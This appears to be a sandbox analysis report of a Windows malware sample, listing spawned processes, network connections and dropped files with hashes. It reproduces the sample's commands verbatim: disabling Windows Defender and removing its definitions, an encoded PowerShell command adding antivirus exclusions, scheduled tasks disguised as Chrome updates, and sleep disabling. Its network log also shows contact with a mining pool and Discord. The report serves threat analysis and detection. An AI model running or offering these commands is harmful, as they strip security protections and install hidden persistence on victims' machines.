"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAawBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAdgB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAeABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAegBsACMAPgA="
C:\Users\Admin\AppData\Roaming\Logger.exe
"C:\Users\Admin\AppData\Roaming\Logger.exe"
C:\Users\Admin\AppData\Roaming\Logger.exe
"C:\Users\Admin\AppData\Roaming\Logger.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
"C:\Users\Admin\AppData\Local\Temp\mainPannel.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\UI.exe
"C:\Users\Admin\AppData\Local\Temp\UI.exe"
C:\Users\Admin\AppData\Local\Temp\GC.exe
"C:\Users\Admin\AppData\Local\Temp\GC.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Logger.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 /prefetch:8
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 /prefetch:8
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Logger.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1932 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1360 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| NL | 88.221.24.18:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 18.24.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fourth-erratic-table.glitch.me | udp |
| US | 3.228.141.245:80 | fourth-erratic-table.glitch.me | tcp |
| US | 3.228.141.245:80 | fourth-erratic-table.glitch.me | tcp |
| US | 8.8.8.8:53 | 245.141.228.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-owcfb.in | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fourth-erratic-table.glitch.me | udp |
| US | 44.205.148.240:80 | fourth-erratic-table.glitch.me | tcp |
| US | 44.205.148.240:80 | fourth-erratic-table.glitch.me | tcp |
| US | 8.8.8.8:53 | 240.148.205.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
Files
memory/5708-2-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/5708-3-0x00000000005C0000-0x00000000048EC000-memory.dmp
memory/5708-4-0x0000000006A90000-0x0000000006AA0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA1 | 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
| SHA512 | 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f |
C:\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA1 | 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
| SHA512 | 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f |
C:\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA1 | 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
| SHA512 | 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f |
memory/6044-28-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/6044-34-0x000001BBD86C0000-0x000001BBD86D0000-memory.dmp
memory/6044-40-0x000001BBD86C0000-0x000001BBD86D0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA1 | 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
| SHA512 | 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\python311.dll
| MD5 | 5792adeab1e4414e0129ce7a228eb8b8 |
| SHA1 | e9f022e687b6d88d20ee96d9509f82e916b9ee8c |
| SHA256 | 7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967 |
| SHA512 | c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wwhoyx4e.jbv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\VCRUNTIME140.dll
| MD5 | 4585a96cc4eef6aafd5e27ea09147dc6 |
| SHA1 | 489cfff1b19abbec98fda26ac8958005e88dd0cb |
| SHA256 | a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736 |
| SHA512 | d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\python311.dll
| MD5 | 5792adeab1e4414e0129ce7a228eb8b8 |
| SHA1 | e9f022e687b6d88d20ee96d9509f82e916b9ee8c |
| SHA256 | 7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967 |
| SHA512 | c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b |
memory/2636-62-0x00007FF896340000-0x00007FF896929000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\VCRUNTIME140.dll
| MD5 | 4585a96cc4eef6aafd5e27ea09147dc6 |
| SHA1 | 489cfff1b19abbec98fda26ac8958005e88dd0cb |
| SHA256 | a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736 |
| SHA512 | d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286 |
memory/6044-58-0x000001BBF09C0000-0x000001BBF09E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\base_library.zip
| MD5 | e17ce7183e682de459eec1a5ac9cbbff |
| SHA1 | 722968ca6eb123730ebc30ff2d498f9a5dad4cc1 |
| SHA256 | ff6a37c49ee4bb07a763866d4163126165038296c1fb7b730928297c25cfbe6d |
| SHA512 | fab76b59dcd3570695fa260f56e277f8d714048f3d89f6e9f69ea700fca7c097d0db5f5294beab4e6409570408f1d680e8220851fededb981acb129a415358d1 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_ctypes.pyd
| MD5 | 1adfe4d0f4d68c9c539489b89717984d |
| SHA1 | 8ae31b831b3160f5b88dda58ad3959c7423f8eb2 |
| SHA256 | 64e8fd952ccf5b8adca80ce8c7bc6c96ec7df381789256fe8d326f111f02e95c |
| SHA512 | b403cc46e0874a75e3c0819784244ed6557eae19b0d76ffd86f56b3739db10ea8deec3dc1ca9e94c101263d0ccf506978443085a70c3ab0816885046b5ef5117 |
memory/2636-71-0x00007FF89D440000-0x00007FF89D463000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\blank.aes
| MD5 | 9baaf674093c1a16ec32e34132f51322 |
| SHA1 | afc51b60ec89af834297e01229566be5b27fab75 |
| SHA256 | 55f06f3d9f2b0a02f4d4e663a4416c0268315b0b30120b6174a2db517f0de8c4 |
| SHA512 | aff6512ca8002573d1c7b95aeaefe7bc6d22d028ef9fc8b4c1ce7537911c8e5a36bdc842685d224761d643f743b0e8c3029945d10601a993889752cf41f82123 |
memory/5708-74-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
memory/2636-76-0x00007FF8ACA00000-0x00007FF8ACA0F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_ctypes.pyd
| MD5 | 1adfe4d0f4d68c9c539489b89717984d |
| SHA1 | 8ae31b831b3160f5b88dda58ad3959c7423f8eb2 |
| SHA256 | 64e8fd952ccf5b8adca80ce8c7bc6c96ec7df381789256fe8d326f111f02e95c |
| SHA512 | b403cc46e0874a75e3c0819784244ed6557eae19b0d76ffd86f56b3739db10ea8deec3dc1ca9e94c101263d0ccf506978443085a70c3ab0816885046b5ef5117 |
C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
memory/6044-78-0x000001BBD86C0000-0x000001BBD86D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UI.exe
| MD5 | a6d1f2686c50110de2fd76df4dcb7057 |
| SHA1 | 75f47ac32fada1bb9371b45006c2b1744347790a |
| SHA256 | ec6c1cb4a88a3a59dbb1a703445bcad065c65e6422504f9278ef5ce9f2a3b446 |
| SHA512 | f5e796aedbd79463a303906b2f56af054039ae64f1600f0bbb25f57c7cc2805f1108ac4f7f5def5dd195c1e094444f9f04a8e8acc9d7a5277377de511963aa66 |
C:\Users\Admin\AppData\Local\Temp\UI.exe
| MD5 | a6d1f2686c50110de2fd76df4dcb7057 |
| SHA1 | 75f47ac32fada1bb9371b45006c2b1744347790a |
| SHA256 | ec6c1cb4a88a3a59dbb1a703445bcad065c65e6422504f9278ef5ce9f2a3b446 |
| SHA512 | f5e796aedbd79463a303906b2f56af054039ae64f1600f0bbb25f57c7cc2805f1108ac4f7f5def5dd195c1e094444f9f04a8e8acc9d7a5277377de511963aa66 |
C:\Users\Admin\AppData\Local\Temp\GC.exe
| MD5 | b2bcd053c6452f8a04ba108d850f9781 |
| SHA1 | d69a9b01e46a84347317f93898c270b0df1fd4ca |
| SHA256 | 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec |
| SHA512 | e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe |
C:\Users\Admin\AppData\Local\Temp\GC.exe
| MD5 | b2bcd053c6452f8a04ba108d850f9781 |
| SHA1 | d69a9b01e46a84347317f93898c270b0df1fd4ca |
| SHA256 | 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec |
| SHA512 | e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe |
memory/324-103-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_lzma.pyd
| MD5 | 3798175fd77eded46a8af6b03c5e5f6d |
| SHA1 | f637eaf42080dcc620642400571473a3fdf9174f |
| SHA256 | 3c9d5a9433b22538fc64141cd3784800c567c18e4379003329cf69a1d59b2a41 |
| SHA512 | 1f7351c9e905265625d725551d8ea1de5d9999bc333d29e6510a5bca4e4d7c1472b2a637e892a485a7437ea4768329e5365b209dd39d7c1995fe3317dc5aecdf |
memory/5708-111-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_sqlite3.pyd
| MD5 | eb6313b94292c827a5758eea82d018d9 |
| SHA1 | 7070f715d088c669eda130d0f15e4e4e9c4b7961 |
| SHA256 | 6b41dfd7d6ac12afe523d74a68f8bd984a75e438dcf2daa23a1f934ca02e89da |
| SHA512 | 23bfc3abf71b04ccffc51cedf301fadb038c458c06d14592bf1198b61758810636d9bbac9e4188e72927b49cb490aeafa313a04e3460c3fb4f22bdddf112ae56 |
memory/2636-119-0x00007FF89D840000-0x00007FF89D859000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\sqlite3.dll
| MD5 | 395332e795cb6abaca7d0126d6c1f215 |
| SHA1 | b845bd8864cd35dcb61f6db3710acc2659ed9f18 |
| SHA256 | 8e8870dac8c96217feff4fa8af7c687470fbccd093d97121bc1eac533f47316c |
| SHA512 | 8bc8c8c5f10127289dedb012b636bc3959acb5c15638e7ed92dacdc8d8dba87a8d994aaffc88bc7dc89ccfeef359e3e79980dfa293a9acae0dc00181096a0d66 |
memory/2636-120-0x00007FF89C310000-0x00007FF89C333000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\sqlite3.dll
| MD5 | 395332e795cb6abaca7d0126d6c1f215 |
| SHA1 | b845bd8864cd35dcb61f6db3710acc2659ed9f18 |
| SHA256 | 8e8870dac8c96217feff4fa8af7c687470fbccd093d97121bc1eac533f47316c |
| SHA512 | 8bc8c8c5f10127289dedb012b636bc3959acb5c15638e7ed92dacdc8d8dba87a8d994aaffc88bc7dc89ccfeef359e3e79980dfa293a9acae0dc00181096a0d66 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_sqlite3.pyd
| MD5 | eb6313b94292c827a5758eea82d018d9 |
| SHA1 | 7070f715d088c669eda130d0f15e4e4e9c4b7961 |
| SHA256 | 6b41dfd7d6ac12afe523d74a68f8bd984a75e438dcf2daa23a1f934ca02e89da |
| SHA512 | 23bfc3abf71b04ccffc51cedf301fadb038c458c06d14592bf1198b61758810636d9bbac9e4188e72927b49cb490aeafa313a04e3460c3fb4f22bdddf112ae56 |
memory/2636-116-0x00007FF89C340000-0x00007FF89C36D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_bz2.pyd
| MD5 | 2d461b41f6e9a305dde68e9c59e4110a |
| SHA1 | 97c2266f47a651e37a72c153116d81d93c7556e8 |
| SHA256 | abbe3933a34a9653a757244e8e55b0d7d3a108527a3e9e8a7f2013b5f2a9eff4 |
| SHA512 | eef132df6e52eb783bad3e6af0d57cb48cda2eb0edb6e282753b02d21970c1eea6bab03c835ff9f28f2d3e25f5e9e18f176a8c5680522c09da358a1c48cf14c8 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_bz2.pyd
| MD5 | 2d461b41f6e9a305dde68e9c59e4110a |
| SHA1 | 97c2266f47a651e37a72c153116d81d93c7556e8 |
| SHA256 | abbe3933a34a9653a757244e8e55b0d7d3a108527a3e9e8a7f2013b5f2a9eff4 |
| SHA512 | eef132df6e52eb783bad3e6af0d57cb48cda2eb0edb6e282753b02d21970c1eea6bab03c835ff9f28f2d3e25f5e9e18f176a8c5680522c09da358a1c48cf14c8 |
memory/5708-112-0x0000000006A90000-0x0000000006AA0000-memory.dmp
